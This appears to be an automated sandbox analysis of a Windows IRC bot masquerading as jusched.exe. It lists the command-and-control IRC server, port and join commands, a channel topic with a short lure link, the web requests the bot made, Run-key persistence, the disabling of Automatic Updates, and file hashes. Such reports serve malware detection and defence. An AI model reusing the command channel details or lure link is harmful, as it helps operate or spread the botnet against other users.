server1.beetrootmusic.com

Remote Host Port Number
184.73.209.168 80
204.0.5.41 80
204.0.5.42 80
204.0.5.48 80
204.0.5.51 80
204.0.5.57 80
204.0.5.58 80
204.0.5.59 80
208.71.125.131 80
216.178.38.168 80
66.225.241.182 2345 PASS xxx

NICK NEW-[USA|00|P|78655]
USER XP-9188 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|78655] -ix
JOIN #!gf! test
PONG 22 MOTD

Now talking in #!gf!
Topic On: [ #!gf! ] [ .m.s|.m.e Foto 😀 http://to.ly/7Blo?= ]
Topic By: [ wd89 ]

* The data identified by the following URLs was then requested from the remote web server:
o http://adx.bidsystem.com/showAd.aspx?pid=50000021&plid=24013&adsize=728×90&fncback=C1Zo2Tc3Pi5B.b1Ro2Uc3Ei5X&fnlocid=270&fan=1
o http://x.myspacecdn.com/Modules/Common/Static/img/cornersSheet3.png
o http://x.myspacecdn.com/modules/common/static/css/Sprites/globalNavRefreshSprite.png
o http://x.myspacecdn.com/Modules/Splash/Static/img/bgSheet.png
o http://x.myspacecdn.com/modules/browse/static/img/btnicons_tiled.gif
o http://x.myspacecdn.com/modules/common/static/css/global_-cca62xx.css
o http://x.myspacecdn.com/modules/common/static/css/uploadcontrol_ioe1imsn.css
o http://x.myspacecdn.com/modules/browse/static/css/browse_qiz4yewv.css
o http://x.myspacecdn.com/modules/profilesdirectory/static/css/browsebyname_4vb3esmf.css
o http://x.myspacecdn.com/modules/common/static/img/spacer.gif
o http://x.myspacecdn.com/modules/common/static/img/onlinenow2.gif
o http://x.myspacecdn.com/modules/splash/static/img/moduleBg.gif
o http://c3.ac-images.myspacecdn.com/images02/117/s_2b622862fa51478493feec136987c75a.jpg
o http://c3.ac-images.myspacecdn.com/images02/118/s_f2aafdddeeb2487a894f5ad6705b04be.jpg
o http://c3.ac-images.myspacecdn.com/images02/124/s_e3821e2df59447b8817efc2c1ed1569a.jpg
o http://c3.ac-images.myspacecdn.com/images02/102/s_93c274eba6244f1cb42a80f236df85d2.jpg
o http://c3.ac-images.myspacecdn.com/images02/134/s_988256b80ad9476d9932f3b29f7a88ee.jpg
o http://c3.ac-images.myspacecdn.com/images02/133/s_fec099e1af494dc8a00227f057461a92.jpg
o http://c3.ac-images.myspacecdn.com/images02/46/s_c92f96c4eacf431d948081a2a944565e.jpg
o http://c3.ac-images.myspacecdn.com/images02/134/s_737638bcb0f845ea8ebb5171160d0612.jpg
o http://c3.ac-images.myspacecdn.com/images02/141/s_f33b1dcf0a8240c087f82c385fffc286.jpg
o http://cms.myspacecdn.com/cms/js/ad_wrapper0159.js
o http://js.myspacecdn.com/modules/common/static/js/atlas/msglobal_uabkhbad.js
o http://js.myspacecdn.com/modules/browse/static/js/browsebundle_kwg2eboy.js
o http://js.myspacecdn.com/modules/common/static/js/jquery/tracking/tynt_zcvgeagv.js?user=bjNOt4bfyr35kFadbiUt4I&lang=en
o http://js.myspacecdn.com/modules/common/static/js/atlas/quickpost_ujzxjul0.js
o http://js.myspacecdn.com/modules/common/static/js/atlas/richtexteditor_uvm5sqtf.js
o http://1.download.advertise.myspace.com/upld/cs/1//cs3_sk_747_.jpg
o http://c2.ac-images.myspacecdn.com/images02/74/s_91435682443b42b9b04db19f678ab9dd.jpg
o http://c2.ac-images.myspacecdn.com/images01/111/s_18a4b19a4523db54a83d2baca2dec379.jpg
o http://c1.ac-images.myspacecdn.com/images02/131/s_ed4d28acc5a648a5a9efb2e87794d33c.jpg
o http://c1.ac-images.myspacecdn.com/images02/98/s_cc5bbc07341f4bad8ec8476e308bfca0.jpg
o http://c2.ac-images.myspacecdn.com/images02/124/s_fe683e1e9aac47c59126ae26b1499099.jpg
o http://c1.ac-images.myspacecdn.com/images02/115/s_909906ff4ed5463692fbc606c1999944.jpg
o http://c2.ac-images.myspacecdn.com/images02/133/s_5337dc59037a410db5a802a4aae3648d.jpg
o http://c2.ac-images.myspacecdn.com/images02/135/s_b568582124e241138683bb3db10b70f5.jpg
o http://c2.ac-images.myspacecdn.com/images02/137/s_b9819ab4ac954910b34a6e6e6659c695.jpg
o http://c1.ac-images.myspacecdn.com/images02/70/s_54b3bec739b145a68cf980ff5f3df20c.jpg
o http://c2.ac-images.myspacecdn.com/images02/129/s_cd5514b97dfb48f39c989267263535f1.jpg
o http://c2.ac-images.myspacecdn.com/images02/107/s_b19372934f4247e99470328bca0da10d.jpg
o http://c2.ac-images.myspacecdn.com/images02/114/s_e9805da8207a41faa8957d06fd3a6599.jpg
o http://c1.ac-images.myspacecdn.com/images02/121/s_cd2da5462fe741a5b9709bb6b722ffec.jpg
o http://c2.ac-images.myspacecdn.com/images02/75/s_d8a8eea160384d9bb67037c2ee560f19.jpg
o http://c2.ac-images.myspacecdn.com/images02/149/s_09c4d367eb2c4322a65e50f4f885acb1.jpg
o http://c1.ac-images.myspacecdn.com/images02/139/s_7bdb5c88aa77447e86e02e730849d454.jpg
o http://c1.ac-images.myspacecdn.com/images02/68/s_a566449eca1e460f81207c4286779c20.jpg
o http://c2.ac-images.myspacecdn.com/images02/117/s_1a24b0e8167a436abcdb9b98859ea601.jpg
o http://c1.ac-images.myspacecdn.com/images02/135/s_52334a0ce2404c8d8f75d7423b4d7d54.jpg
o http://c4.ac-images.myspacecdn.com/images02/120/s_43618db7fdb74631b96c92fe67d38143.jpg
o http://c4.ac-images.myspacecdn.com/images02/132/s_e17dfa91ef6445f6baf7b9865e2fa7c3.jpg
o http://c4.ac-images.myspacecdn.com/images02/108/s_b1f0939adffb496cb2470d539193e32b.gif
o http://c4.ac-images.myspacecdn.com/images02/131/s_bd61a209fd8043eb85966ffb81f2f9b3.jpg
o http://c4.ac-images.myspacecdn.com/images02/77/s_af51bd10dfcf4a33950ceec8359e8c5f.jpg
o http://c4.ac-images.myspacecdn.com/images02/116/s_54537d8728df41418fa0fb636c84db33.jpg
o http://c4.ac-images.myspacecdn.com/images02/26/s_3df17dee8fce4ef996c8488cb9deba3f.jpg
o http://oasn04.247realmedia.com/RealMedia/ads/adstream_sx.ads/Fox/ATTWrtb/Q2/legPRSPCT/All/1[timestamp]@x90
o http://mig.nexac.com/2/B3DM/DLX/1406668043@x96?
o http://browseusers.myspace.com/Browse/Browse.aspx
o http://desk.opt.fimserve.com/adopt/?r=h&l=24000000&pos=skyscraper&rnd=358725534
o http://delb.opt.fimserve.com/adopt/?r=h&l=24000000&pos=leaderboard&rnd=358725534
o http://fim.adnxs.com/fpt?id=3594&size=728×90&flash=1&cookies=1&callback=C1Zo2Tc3Pi5B.b2Wr2Ok3Zo5T&referrer=www.foxaudiencenetwork.com&age=&gender=&cb=1287494701736
o http://geo-lb01.w55c.net/x/brs1009?cbid=C1Zo2Tc3Pi5B.b0Be2Ga3Yf5R&cb=1287494701736&size=728×90&ess=MySpaceUGC
o http://www.google-analytics.com/ga.js
o http://googleads.g.doubleclick.net/pagead/test_domain.js
o http://googleads.g.doubleclick.net/pagead/imgad?id=CMfEouDZzpeuogEQoAEYwgQyCEfzWSQmkjYJ
o http://pagead2.googlesyndication.com/pagead/show_ads.js
o http://pagead2.googlesyndication.com/pagead/expansion_embed.js
o http://pagead2.googlesyndication.com/pagead/render_ads.js

Other details

* The following port was open in the system:

Port Protocol Process
1058 TCP jusched.exe (%Windir%jusched.exe)

Registry Modifications

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Java developer Script Browse = “%Windir%jusched.exe”

so that jusched.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun]
+ Java developer Script Browse = “%Windir%jusched.exe”

so that jusched.exe runs every time Windows starts
o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
+ Java developer Script Browse = “%Windir%jusched.exe”

so that jusched.exe runs every time Windows starts

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
jusched.exe %Windir%jusched.exe 3 141 632 bytes

* The following system service was modified:

Service Name Display Name New Status Service Filename
wuauserv Automatic Updates “Stopped” %System%svchost.exe -k netsvcs

File System Modifications

* The following file was created in the system:

# Filename(s) File Size File Hash
1 %Windir%jusched.exe
[file and pathname of the sample #1] 200 704 bytes MD5: 0xD3D5D37E3ED8A3553FC846F90BEE7919
SHA-1: 0x2C26E621C21E992BC151906A3088FA1A335357CE